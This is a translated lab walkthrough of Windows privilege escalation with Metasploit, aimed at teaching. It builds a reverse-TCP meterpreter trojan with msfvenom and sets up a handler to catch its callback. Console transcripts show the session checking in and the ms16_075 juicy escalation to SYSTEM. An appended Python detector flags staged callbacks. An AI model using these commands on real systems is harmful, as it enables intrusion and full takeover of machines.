Windows exploit-based privilege escalation [fully automated privesc practice with msf]
Environment
Windows Server 2012 target (victim), Kali attacker machine, Windows 10 (only used as a relay for files; the first two are what matter)
Windows2012
(VMware Tools cannot be installed on this VM, so it cannot exchange files with the host machine. I therefore set up a shared folder on my Win10 host so the machines can exchange files, which makes the later steps easier.
In a normal engagement flow, Server 2012 would be running a web service; after getting a shell through it you would upload the trojan, run it, and it would check in to msf.)
Generating the exe trojan on Kali
A Windows reverse-connect trojan, msf.exe, whose callback address is the Kali address and whose callback port is 4444:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.54 LPORT=4444 -f exe -o msf.exe
Then drag the trojan into the shared folder on the host machine.
Uploading the trojan
Because the host and the target cannot exchange files directly, take another route: the two machines are on the same subnet, so enable file sharing on the host and use the share to move the trojan to the target.
Pick a folder to use as the shared folder.
Right-click -> Properties -> Sharing -> select Everyone and click Add.
Grant it Full Control.
This also avoids other problems later on.
Back on the Sharing tab -> open Network and Sharing Center.
This is to turn off password-protected sharing; otherwise the target will be prompted for an account and password.
Access the share from the target -> copy the trojan over.
The path is long because I put the trojan in a subfolder of the shared folder (not a big deal); from there it can be copied out.
Listener on Kali
Enter: msfconsole
Select the handler module: use exploit/multi/handler
Set the payload: set payload windows/meterpreter/reverse_tcp
(this payload must match the one used when the trojan was generated)
See what else needs to be set: options
Set lhost: set lhost 192.168.10.54
(the listen address, which is also the callback address baked into the trojan, i.e. Kali itself)
Set the port: it must match the trojan's callback port (mine defaults to 4444, so nothing to change)
Start listening: run
Run the trojan on the target -> the session checks in to msf
kali监听
输入 :msfconsole
选择监听模块 :use exploit/multi/handler
设置payload:set payload windows/meterpreter/reverse_tcp
(该payload,应该与生成木马时的payload一样)
查看还需要设置什么:options
设置一个lhost地址:set lhost 192.168.10.54
(监听地址,也是木马生成时的反弹地址(kali本机))
设置端口:与木马反弹的端口一致(这里我默认就是4444,所以不用改)
开启监听:run
靶机运行木马-》msf上线
┌──(root㉿kali)-[/home/kali]
└─# msfconsole
(msfconsole ASCII-art banner omitted)

       =[ metasploit v6.3.19-dev                          ]
+ -- --=[ 2318 exploits - 1215 auxiliary - 412 post       ]
+ -- --=[ 1234 payloads - 46 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Enable verbose logging with set VERBOSE true
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/met
set payload windows/meterpreter/bind_hidden_ipknock_tcp
set payload windows/meterpreter/bind_hidden_tcp
set payload windows/meterpreter/bind_ipv6_tcp
set payload windows/meterpreter/bind_ipv6_tcp_uuid
set payload windows/meterpreter/bind_named_pipe
set payload windows/meterpreter/bind_nonx_tcp
set payload windows/meterpreter/bind_tcp
set payload windows/meterpreter/bind_tcp_rc4
set payload windows/meterpreter/bind_tcp_uuid
set payload windows/meterpreter/reverse_hop_http
set payload windows/meterpreter/reverse_http
set payload windows/meterpreter/reverse_http_proxy_pstore
set payload windows/meterpreter/reverse_https
set payload windows/meterpreter/reverse_https_proxy
set payload windows/meterpreter/reverse_ipv6_tcp
set payload windows/meterpreter/reverse_named_pipe
set payload windows/meterpreter/reverse_nonx_tcp
set payload windows/meterpreter/reverse_ord_tcp
set payload windows/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp_allports
set payload windows/meterpreter/reverse_tcp_dns
set payload windows/meterpreter/reverse_tcp_rc4
set payload windows/meterpreter/reverse_tcp_rc4_dns
set payload windows/meterpreter/reverse_tcp_uuid
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set lhost 192.168.10.54
lhost => 192.168.10.54
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.10.54:4444
[*] Sending stage (175686 bytes) to 192.168.10.62
[*] Meterpreter session 1 opened (192.168.10.54:4444 -> 192.168.10.62:49196) at 2023-07-21 09:28:52 +0800
Normally the trojan would be uploaded through the webshell and then started from the command line. But the 2012 target has no web service, so I simply ran it on the target by double-clicking (this gives administrator privileges; that is fine, our goal is to escalate to SYSTEM).
Check the current privileges
Background the session
bg
Privilege escalation
Switch to the exploit-suggester module
use post/multi/recon/local_exploit_suggester
See what needs to be set
options
Set the session
set session 1
Start it
run
Command transcript
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits


View the full module info with the info, or info -d command.

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
It then automatically checks which exploitable vulnerabilities are present and lists them when it finishes.
"yes" means the vulnerability is likely present and exploitable; "no" means it is not.
Running the privilege escalation
Select a module: use exploit/windows/local/ms16_075_reflection_juicy
See which settings it needs: options
Set the session: set session 1
Start it: run
Command transcript
msf6 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/ms16_075_reflection
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_075_reflection) > options

Module options (exploit/windows/local/ms16_075_reflection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  none             yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.10.54    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms16_075_reflection) > set session 1
session => 1
msf6 exploit(windows/local/ms16_075_reflection) > run

[*] Started reverse TCP handler on 192.168.10.54:4444
[*] x64
[-] Exploit aborted due to failure: bad-config: Session/Target Arch mismatch; WOW64 not supported
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms16_075_reflection) > use exploit/windows/local/ms16_075_reflection_juicy
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set session 1
session => 1
msf6 exploit(windows/local/ms16_075_reflection_juicy) > run
The privilege escalation succeeded.
Originally published on the WeChat public account (小白摸坑学网安): Windows溢出提权 [msf全自动提权练习]
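Seen from the defender's side, both the initial check-in and the second session the local exploit opens through the same handler leave the same footprint in the handler output above: a fresh outbound connection from 192.168.10.62 to 192.168.10.54:4444 that immediately receives a ~175 KB stage. The following detector is an added example, not part of the original write-up; the flow records, the port allowlist and the thresholds are constructed assumptions modelled on that output.

```python
from dataclasses import dataclass


@dataclass
class Flow:
    """One TCP flow record, in the style of a NetFlow or Zeek conn.log entry."""
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    bytes_out: int   # bytes the client (victim) sent
    bytes_in: int    # bytes the client received
    duration_s: float


# Constructed sample flows modelled on the handler output in this write-up
# (192.168.10.62 -> 192.168.10.54:4444, stage of 175686 bytes). Not real capture data.
SAMPLE_FLOWS = [
    Flow("2023-07-21 09:28:52", "192.168.10.62", 49196, "192.168.10.54", 4444, 600, 175686, 1.1),
    Flow("2023-07-21 09:29:10", "192.168.10.62", 49197, "192.168.10.14", 445, 12000, 9000, 25.0),
    Flow("2023-07-21 09:35:02", "192.168.10.62", 49205, "192.168.10.30", 443, 4000, 220000, 2.0),
    Flow("2023-07-21 09:41:37", "192.168.10.62", 49210, "192.168.10.54", 4444, 580, 175686, 0.9),
]

COMMON_PORTS = {22, 25, 53, 80, 443, 445, 3389}  # assumed allowlist; tune per environment
MIN_STAGE_BYTES = 100_000   # a meterpreter reverse_tcp stage is on the order of 175 KB
MAX_CLIENT_BYTES = 4_096    # the stager sends almost nothing before the stage arrives
MAX_SECONDS = 5.0           # the stage lands within seconds of the connect


def is_stager_like(f: Flow) -> bool:
    """Large server->client blob right after connect, on an uncommon port."""
    return (f.dport not in COMMON_PORTS
            and f.bytes_in >= MIN_STAGE_BYTES
            and f.bytes_out <= MAX_CLIENT_BYTES
            and f.duration_s <= MAX_SECONDS)


def find_callbacks(flows):
    """Return (flow, note) pairs for suspected staged callbacks. A repeat callback
    from the same host to the same listener is flagged separately, because that is
    what a second session opened by a local exploit looks like."""
    alerts, seen = [], {}
    for f in flows:
        if not is_stager_like(f):
            continue
        key = (f.src, f.dst, f.dport)
        seen[key] = seen.get(key, 0) + 1
        note = "initial staged callback" if seen[key] == 1 else f"repeat callback #{seen[key]} to same listener"
        alerts.append((f, note))
    return alerts


if __name__ == "__main__":
    for f, note in find_callbacks(SAMPLE_FLOWS):
        print(f"{f.ts} {f.src}:{f.sport} -> {f.dst}:{f.dport} in={f.bytes_in}B  {note}")
```

The 443 flow is deliberately not flagged by this heuristic: an HTTPS-based stager (reverse_https) needs TLS inspection or beaconing analysis instead of a size-and-port rule.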